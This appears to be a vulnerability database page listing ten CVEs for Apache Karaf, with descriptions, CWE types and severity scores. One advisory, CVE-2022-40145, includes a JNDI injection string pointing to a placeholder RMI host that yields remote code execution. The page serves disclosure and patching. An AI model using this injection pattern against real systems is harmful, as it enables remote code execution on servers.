Vulnerabilities > Apache > Karaf > 4.0.2

DATE CVE VULNERABILITY TITLE RISK
2022-12-21 CVE-2022-40145 Unspecified vulnerability in Apache Karaf
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
network
low complexity
apache
critical
9.8
2022-01-26 CVE-2021-41766 Deserialization of Untrusted Data vulnerability in Apache Karaf
Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX).
network
apache CWE-502
6.8
2022-01-26 CVE-2022-22932 Path Traversal vulnerability in Apache Karaf
Apache Karaf obr:* commands and run goal on the karaf-maven-plugin have partial path traversal which allows to break out of expected folder.
network
low complexity
apache CWE-22
5.0
2020-06-12 CVE-2020-11980 Server-Side Request Forgery (SSRF) vulnerability in Apache Karaf
In Karaf, JMX authentication takes place using JAAS and authorization takes place using ACL files.
network
low complexity
apache CWE-918
6.5
2019-05-09 CVE-2019-0226 Path Traversal vulnerability in Apache Karaf
Apache Karaf Config service provides a install method (via service or MBean) that could be used to travel in any directory and overwrite existing file.
network
low complexity
apache CWE-22
4.9
2019-03-21 CVE-2019-0191 Path Traversal vulnerability in Apache Karaf
Apache Karaf kar deployer reads .kar archives and extracts the paths from the "repository/" and "resources/" entries in the zip file.
network
low complexity
apache CWE-22
6.5
2019-01-07 CVE-2018-11788 XXE vulnerability in Apache Karaf
Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML by dropping the file directly in the deploy folder.
network
low complexity
apache CWE-611
7.5
2018-09-18 CVE-2018-11787 Improper Authentication vulnerability in Apache Karaf
In Apache Karaf version prior to 3.0.9, 4.0.9, 4.1.1, when the webconsole feature is installed in Karaf, it is available at .../system/console and requires authentication to access it.
network
high complexity
apache CWE-287
8.1
2018-09-18 CVE-2018-11786 Improper Privilege Management vulnerability in Apache Karaf
In Apache Karaf prior to 4.2.0 release, if the sshd service in Karaf is left on so an administrator can manage the running instance, any user with rights to the Karaf console can pivot and read/write any file on the file system to which the Karaf process user has access.
network
low complexity
apache CWE-269
8.8
2018-02-19 CVE-2016-8750 LDAP Injection vulnerability in Apache Karaf
Apache Karaf prior to 4.0.8 used the LDAPLoginModule to authenticate users to a directory via LDAP.
network
low complexity
apache CWE-90
4.0